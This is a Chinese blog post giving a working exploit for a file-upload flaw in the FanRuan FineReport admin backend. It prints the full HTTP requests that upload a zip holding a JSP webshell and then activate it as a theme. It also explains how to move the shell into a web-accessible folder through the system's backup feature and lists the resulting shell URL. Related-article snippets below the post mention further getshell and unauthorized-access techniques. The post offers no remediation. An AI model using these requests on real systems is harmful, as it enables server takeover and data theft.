帆软后台(外观配置-主题)文件上传漏洞

最新推荐文章于 2024-08-08 08:00:00 发布
原创 最新推荐文章于 2024-08-08 08:00:00 发布 · 1.7k 阅读 · 9 ·
CC 4.0 BY-SA版权
本文为博主原创文章,未经博主允许不得转载。
文章标签:

#帆软 #文件上传

文章描述了在帆软管理系统中,通过上传主题压缩包并利用CORS漏洞,成功在非Web目录下植入Webshell。攻击者需备份整个工程并将Webshell移动到Web目录的过程也详细阐述。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞利用

帆软上传主题获取shell(管理系统-外观配置)
添加主题上传的压缩包中放入shell.jsp马 (没有添加主题功能直接构造数据包)
image.png

POST /WebReport/ReportServer?op=fr_attach&cmd=ah_upload&filename=test.zip&width=240&height=198 HTTP/1.1
Host: xxx
Content-Length: 749
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: multipart/form-data; boundary=AjaxUploadBoundary1638899444076, multipart/form-data
Accept: */*
Origin: https://xx
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

------WebKitFormBoundaryNN5BrMluNxGE4HCB
Content-Disposition: form-data; name="FileData"; filename="test.zip"
Content-Type: application/zip

zip内容
------WebKitFormBoundaryNN5BrMluNxGE4HCB--

注意:
此处用burpsuite “paster from file”压缩包会出问题,需要在burpsuite修改如下即可正常。
image.png
image.png
获取上传ID后通过接口通过下面的数据包释放主题。

POST /WebReport/ReportServer?op=fs_manager&cmd=save_theme HTTP/1.1
Host: xx
Cookie: JSESSIONID=82B5084E106B1F09978248EE247E1E84; fr_password=""; fr_remember=false
Content-Length: 49
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://60.222.220.228
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://xxx/WebReport/ReportServer?op=fs
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Cookie: JSESSIONID=7BC53BE2461251A5B8A2D097FFE8986D; fr_remember=false; fr_password=; fr_username=admin; td_cookie=3756473647

id=f0757ae6-08fe-4704-9617-5dc7a3880096&serverID=

image.png
当上传压缩包名称为shell.zip则会将木马释放在
/webapps/WebReport/WEB-INF/resources/fstheme/fs-theme-test/目录下名称为app.jsp,但当前目录并非 web 目录,web 无法访问 webshell。
image.png
为了将 webshell 移动要 web 目录,需要整体工程备份,备份文件夹名称为“222”
/webapps/WebReport/bakup/all_bakup/manualbackup/222/WEB-INF/resources/fstheme/fs-theme-app/ 路径下。
image.png
直接访问Shell地址:
http://xxxx/WebReport/bakup/all_bakup/manualbackup/222/WEB-INF/resources/fstheme/fs-theme-test/app.jsp
image.png

报表决策系统 上传excel文件
帆软爱好者的专栏
11-14 1442
这个属于二次开发的,比如我要在决策系统中开发一个功能,上传excel文件或者其他文件,
数据决策系统漏洞_报表漏洞总结
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-24 4202
一、数据决策系统漏洞背景,FineReport报表件是件(中国)公司自主研发的一款纯Java编写的企业级web报表件。主要针对2012年7.0版本存在一些安全漏洞问题。 二、数据决策系统漏洞版本查看弱口令漏洞提供了访问此页面方法 三、数据决策系统漏洞漏洞总结 1.未授权访问漏洞 http://ip/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false //未授权访问内网ip的日志 http://ip/Repo
V9任意文件覆盖漏洞+无损上传
网络安全。
01-15 3514
由于WebReport V9在安装之后在WebReport目录下存在update.jsp和update1.jsp,因此可以构造payload直接覆盖这两个文件的内容,从而GetShell。要由chartmapsvg开头,包含.svg时会先创建文件,然后再到后续逻辑,所以只需要xxx.svg.jsp这种格式,不需要覆盖原有文件即可无损利用成功。上传其他 webshell 同理,建议哥斯拉、冰蝎等等。注意:木马的双引号要转义一下。
文件上传漏洞,文件包含漏洞,黑白名单
2301_79968824的博客
10-21 892
在php里,我们就是使用上面列举的那几个函数来达到这个目的的,它的工作流程:如果你想在 main.php里包含share.php,我将这样写 include("share.php") ,然后就可以使用share.php中的函数了,像这个写死需要包含的文件名称的自然没有什么问题,也不会出现漏洞,那么问题到底是出在哪里呢?服务器端的检查最好使用白名单过滤的方法,这样能防止大小写等方式的绕过,同时还需对%00截断符进行检测,对HTTP包头的content-type也和上传文件的大小也需要进行检查。
2021hvv--上传漏洞
qq_52612931的博客
08-12 2084
漏洞
我的开发踩坑日志⑤之上传文件
黑人の乔丹鞋的博客
06-21 2010
原生提供的文件控件 它可以上传文件到数据库,数据库字段要设置二进制,比如:SQL SERVER中字段设置成image 优点方便快捷,缺点文件尺寸不能过大,推荐是1MB内。 官方文章:https://help.fanruan.com/finereport/doc-view-599.html 插件市场也提供了 本文指在搭建自己的上传功能,它有两份组成 前端UI 后端接口 前端UI与后端接口可以另搭一个Web Service提供。我这里前端UI就放到的Tomcat中一起代理,后端接口用ASP
报表 V8.0 组合拳漏洞分析及复现
2301_80115097的博客
12-15 6468
FineReport是一款企业级报表设计和数据可视化件,纯Java编写的企业级web报表工具。它提供了强大的报表设计、数据分析和数据可视化功能,旨在帮助企业用户轻松地创建高质量的报表和数据分析图表。
报表文件上传、下载及删除功能
wsdhla的专栏
11-21 1万+
报表文件上传、下载及删除功能
FineReport10.0版本更新
weixin_44545337的博客
10-09 5955
FineReport10.0版本更新 - 2018年10月 〇、综述 如果我们把FineReport比喻成一棵大树,FR9.0让这棵树长的更高,长出更多枝丫,我们从智能·共享·开放3个角度,延伸更多场景,提供更广阔的想象空间。而我们FR10.0则希望这棵树的根扎的更深更稳,因此我们从安全性、大并发、高可用等几个角度发力,希望能让FR成长为企业可信赖的报表中心,能支撑起繁杂的报表业务,为企业报表应用...
上传文件到服务器,自定义上传文件至 FTP 服务器
weixin_36261449的博客
08-10 3559
2.1编写类文件编写 Java 类,继承 OutputActionHandler接口,如下所示:package com.fr.output;import com.fr.schedule.base.bean.output.OutputClass;import com.fr.schedule.base.bean.output.OutputFtp;import com.fr.schedule.base...
V9 Getshell 漏洞
swordheart的博客
07-08 6186
0x00 任意文件上传漏洞【FineReport V9】0x01 漏洞描述此漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 JSP 文件进行覆盖,寻找Tomcat 启动后默认存在的 JSP 文件0x02 漏洞详情 payload 替换成冰蝎的马,即可getshell0x03 临时修复建议排查是否使用系统,并同步在AF自定义禁止访问webroot/ReportServer路径。...
solly0880#wiki# V9 任意文件覆盖文件上传1
07-25
V9 任意文件覆盖文件上传漏洞描述 V9 存在任意文件覆盖,导致攻击者可以任意文件上传漏洞影响 V9漏洞复现。
后台下载 main
dou15229356480的博客
06-25 679
package avicit; import java.io.File; import java.io.FileOutputStream; import javax.servlet.http.HttpServletRequest; import com.fr.base.FRContext; import com.fr.dav.LocalEnv; import com.fr.general.Modu...
报表漏洞总结
weixin_51345872的博客
09-05 9844
仅供学习参考使用,任何违法事情与本人无关
报表 V8 get_geo_json 任意文件读取漏洞
huangyongkang666的博客
01-25 8683
报表 V8 get_geo_json 任意文件读取漏洞 CNVD-2018-04757
详细分析后台单点登录的配置事项(图文分析)
最新发布
码农研究僧的博客
08-08 1050
的文档,推荐阅读:官网文档-单点阅读 更多的知识点从学习,以下文章只是做一个踩坑排查,以图文更好的展示 为了保证安全,后端做用户的加密是最好的方式,从而实现无感登录 与自身第三方平台公用一套账号密码,但是这样账号密码需要二次维护,毕竟两个平台(如果好维护也可行) 不设置密码,直接通过第三方平台来访问,如果知道报表名字,可能会通过拼接的方式来访问(不可行) 通过自身第三方平台,以按钮触发的形式(带动加密的url)来触发,对应访问,达到单点登录的无感访问,不用再次输入账号密码(可行)
文件上传漏洞
weixin_59872639的博客
02-22 1万+
文件上传 文件上传是现代互联网常见的功能,允许用户上传图片、视频、及其他类型文件,向用户提供的功能越多,Web受攻击的风险就越大。 文件上传漏洞 上传文件时,如果未对上传的文件进行严格的验证和过滤,就容易造成文件上传漏洞,上传脚本文件(包括asp、aspx、php、jsp等) 恶意上传行为可能导致网站甚至整个服务器被控制。恶意的脚本文件又被称为WebShell,WebShell具有强大的功能,如查看服务器目录、服务器中文件、执行系统命令等。 文件上传漏洞成因 文件上传漏洞的成因(复杂),一方
报表中使用悦享版文件上传下载插件UUID问题
帆软爱好者的专栏
03-21 981
这里只说上传,当我们使用悦享版文件上传下载插件做上传填报时,按照插件说明,如果文件名配置为uuid,通过函数FILENAME获取到的其实是文件的原始名称,并不是uuid名称.那么如果我想拿到这个uuid,并且保存到数据库中时,如何做呢?这里做上传有两种方案,第一种是根据插件说明中的使用事件,就是另外放一个按钮,点击按钮先上传文件后拿到uuid,再点报表的提交,将uuid拿到后与其他填报字段一起入库。
FineReport/FineBI channel反序列化漏洞分析
热门推荐
errorr0
07-18 2万+
漏洞分析
文件控件上传多文件
05-18
要实现在中上传多个文件,可以使用文件上传控件,并设置其允许多选。具体步骤如下: 1. 在报表中将文件上传控件拖入需要上传文件的位置。 2. 右键单击文件上传控件,选择“控件属性”。 3. 在“常规”选项卡中,将“多选”属性设置为“是”。 4. 在“数据”选项卡中,设置数据类型为“二进制流”。 5. 在“事件”选项卡中,选择“上传成功后执行”的事件,然后单击“编辑”按钮。 6. 在事件编辑器中,可以使用 VBScript 代码来处理上传的文件。例如,可以使用以下代码保存上传的文件到服务器: ``` Dim uploadPath uploadPath = Server.MapPath("uploads\") For Each file In Request.Files If file.Size > 0 Then file.SaveAs uploadPath & file.FileName End If Next ``` 7. 保存报表并预览,就可以在文件上传控件中选择并上传多个文件了。上传成功后,可以在服务器指定的目录中找到上传的文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值